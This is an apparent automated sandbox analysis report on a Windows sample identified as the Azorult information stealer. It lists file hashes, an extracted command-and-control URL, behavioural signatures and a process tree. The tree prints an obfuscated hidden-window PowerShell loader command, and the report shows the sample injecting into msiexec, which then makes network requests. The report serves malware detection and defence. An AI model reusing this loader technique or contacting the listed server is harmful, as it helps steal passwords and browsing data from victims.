Analysis
-
max time kernel
148s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20250207-en -
resource tags
arch:x64arch:x86image:win10v2004-20250207-enlocale:en-usos:windows10-2004-x64system -
submitted
08-02-2025 04:29
Static task
static1
Behavioral task
behavioral1
Sample
cfc18a036f28fc7a233ed8daaf747998a84b66fe3bd91d5decc45d61f1e45382.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
cfc18a036f28fc7a233ed8daaf747998a84b66fe3bd91d5decc45d61f1e45382.exe
Resource
win10v2004-20250207-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20250207-en
General
-
Target
cfc18a036f28fc7a233ed8daaf747998a84b66fe3bd91d5decc45d61f1e45382.exe
-
Size
930KB
-
MD5
18cb6529a2a76b61525e325c8bcb655c
-
SHA1
6f8a09e90e79d3ee48c8ff76bb89f76adc7a2ca1
-
SHA256
cfc18a036f28fc7a233ed8daaf747998a84b66fe3bd91d5decc45d61f1e45382
-
SHA512
80edaa6f24461f814f9748f8f67fb901e8731e89024d7e0239220282204601b9e7ba727968cb7086a63d3154a8e703242ac915e88dd7110c75224d35bb7d938d
-
SSDEEP
24576:PuA8nLoZQSVTkp2jT6RJNBIQll+hQT2jiux5f:1AoZBop2juRFIQlluQsx1
Malware Config
Extracted
azorult
http://79.110.49.155/cyb1/index.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Azorult family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3960 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 36 4288 Process not Found -
Loads dropped DLL 1 IoCs
pid Process 4484 cfc18a036f28fc7a233ed8daaf747998a84b66fe3bd91d5decc45d61f1e45382.exe -
Blocklisted process makes network request 5 IoCs
flow pid Process 12 4912 msiexec.exe 16 4912 msiexec.exe 18 4912 msiexec.exe 21 4912 msiexec.exe 27 4912 msiexec.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 4912 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3960 powershell.exe 4912 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cfc18a036f28fc7a233ed8daaf747998a84b66fe3bd91d5decc45d61f1e45382.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4336 MicrosoftEdgeUpdate.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 3960 powershell.exe 3960 powershell.exe 3960 powershell.exe 3960 powershell.exe 3960 powershell.exe 3960 powershell.exe 3960 powershell.exe 3960 powershell.exe 3960 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3960 powershell.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 3960 powershell.exe Token: SeIncreaseQuotaPrivilege 3960 powershell.exe Token: SeSecurityPrivilege 3960 powershell.exe Token: SeTakeOwnershipPrivilege 3960 powershell.exe Token: SeLoadDriverPrivilege 3960 powershell.exe Token: SeSystemProfilePrivilege 3960 powershell.exe Token: SeSystemtimePrivilege 3960 powershell.exe Token: SeProfSingleProcessPrivilege 3960 powershell.exe Token: SeIncBasePriorityPrivilege 3960 powershell.exe Token: SeCreatePagefilePrivilege 3960 powershell.exe Token: SeBackupPrivilege 3960 powershell.exe Token: SeRestorePrivilege 3960 powershell.exe Token: SeShutdownPrivilege 3960 powershell.exe Token: SeDebugPrivilege 3960 powershell.exe Token: SeSystemEnvironmentPrivilege 3960 powershell.exe Token: SeRemoteShutdownPrivilege 3960 powershell.exe Token: SeUndockPrivilege 3960 powershell.exe Token: SeManageVolumePrivilege 3960 powershell.exe Token: 33 3960 powershell.exe Token: 34 3960 powershell.exe Token: 35 3960 powershell.exe Token: 36 3960 powershell.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 4484 wrote to memory of 3960 4484 cfc18a036f28fc7a233ed8daaf747998a84b66fe3bd91d5decc45d61f1e45382.exe 85 PID 4484 wrote to memory of 3960 4484 cfc18a036f28fc7a233ed8daaf747998a84b66fe3bd91d5decc45d61f1e45382.exe 85 PID 4484 wrote to memory of 3960 4484 cfc18a036f28fc7a233ed8daaf747998a84b66fe3bd91d5decc45d61f1e45382.exe 85 PID 3960 wrote to memory of 4912 3960 powershell.exe 88 PID 3960 wrote to memory of 4912 3960 powershell.exe 88 PID 3960 wrote to memory of 4912 3960 powershell.exe 88 PID 3960 wrote to memory of 4912 3960 powershell.exe 88
Processes
-
C:\Users\Admin\AppData\Local\Temp\cfc18a036f28fc7a233ed8daaf747998a84b66fe3bd91d5decc45d61f1e45382.exe"C:\Users\Admin\AppData\Local\Temp\cfc18a036f28fc7a233ed8daaf747998a84b66fe3bd91d5decc45d61f1e45382.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4484 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Skylark=gc -raw 'C:\Users\Admin\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Smutches\Jormungandr.Mos';$Gymnaster=$Skylark.SubString(69514,3);.$Gymnaster($Skylark) "2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3960 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4912
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7OEE4NUMwNkUtRDVGQS00NzMwLUI4MkUtODBEMUU4RjJDNzNBfSIgdXNlcmlkPSJ7MzNGQzM1ODUtNjREMS00MUJDLUIwMDctQ0VBQzk0NTlGRTFGfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7RTA5MUUwRkUtNTA0RC00MTI5LTgwQ0MtMjQ2QUVCODA3MkEwfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIxIiBpbnN0YWxsZGF0ZXRpbWU9IjE3Mzg5NDU1NzgiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4MzQxODAxNjUyMzAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1MzMyNTQyMjMyIi8-PC9hcHA-PC9yZXF1ZXN0Pg1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:4336
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
342KB
MD58b962d673953df97bd216bdc6ac42f11
SHA1789b51e630b5ba4f24871adc00c35750850a63dc
SHA25642849da3722d1fcb536e8569d1acc85ac6351dd5a7f11859c93dab1f4d8dd6d7
SHA512111caab98f9fd68f2c17f7051ae3fd806bbd16266edd0b7431cec08795628e1672da5707cb7080866ba950b1d0bbc96d4e30a9e0941762b95926b370b3f437ce
-
Filesize
68KB
MD522b63832449805f5bd18cde2deda97c7
SHA11e7bd2f8beec10398acbda317391d45dd8e9ce69
SHA256ed170574392e90129df48de26f379aaa41834be121fc46ba32feca95f8659b74
SHA512c49b4269086b98b032966bc7444d670a68aa5606f33d86f4476d1ebcdd6f2a7a1dcc581e6efa90e793667b5a3944fcc411822cd34e3ec3f3ddfee2d4f893f332
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD551e63a9c5d6d230ef1c421b2eccd45dc
SHA1c499cdad5c613d71ed3f7e93360f1bbc5748c45d
SHA256cd8496a3802378391ec425dec424a14f5d30e242f192ec4eb022d767f9a2480f
SHA512c23d713c3c834b3397c2a199490aed28f28d21f5781205c24df5e1e32365985c8a55be58f06979df09222740ffa51f4da764ebc3d912cd0c9d56ab6a33cab522